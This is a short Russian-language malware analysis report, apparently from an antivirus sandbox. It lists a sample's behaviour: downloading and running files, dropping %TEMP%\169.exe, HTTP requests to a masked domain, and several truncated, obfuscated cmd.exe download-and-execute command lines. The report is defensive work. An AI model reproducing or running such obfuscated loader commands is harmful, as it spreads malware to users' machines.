Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set rl=BwjmQGtlMAOOXjKLnWlucbH vxg+'?:\I)zi0(6;DsP-fVa$@1dkh=CoeS}9YF8,.yU\2Nrp{Z&&for %1 in (47,57,13,73,53,28,57,16,0,28,39,47,42,9,14,53,16,56,1...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\169.exe
Сетевая активность
Подключается к
- 'ki###sinfa.com':80
TCP
Запросы HTTP GET
- http://ki###sinfa.com/tyclam/fressr.php?l=##########
- http://www.ki###sinfa.com/tyclam/fressr.php?l=##########
UDP
- DNS ASK ki###sinfa.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set rl=BwjmQGtlMAOOXjKLnWlucbH vxg+'?:\I)zi0(6;DsP-fVa$@1dkh=CoeS}9YF8,.yU\2Nrp{Z&&for %1 in (47,57,13,73,53,28,57,16,0,28,39,47,42,9,14,53,16,56,1...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set rl=BwjmQGtlMAOOXjKLnWlucbH vxg+'?:/I)zi0(6;DsP-fVa$@1dkh=CoeS}9YF8,.yU\2Nrp{Z&&for %1 in (47,57,13,73,53,28,57,16,0,28,39,47,42,9,14,53,16,56,1,43,55,21,13,56,20,6,23,69,56,6,64,17,56...
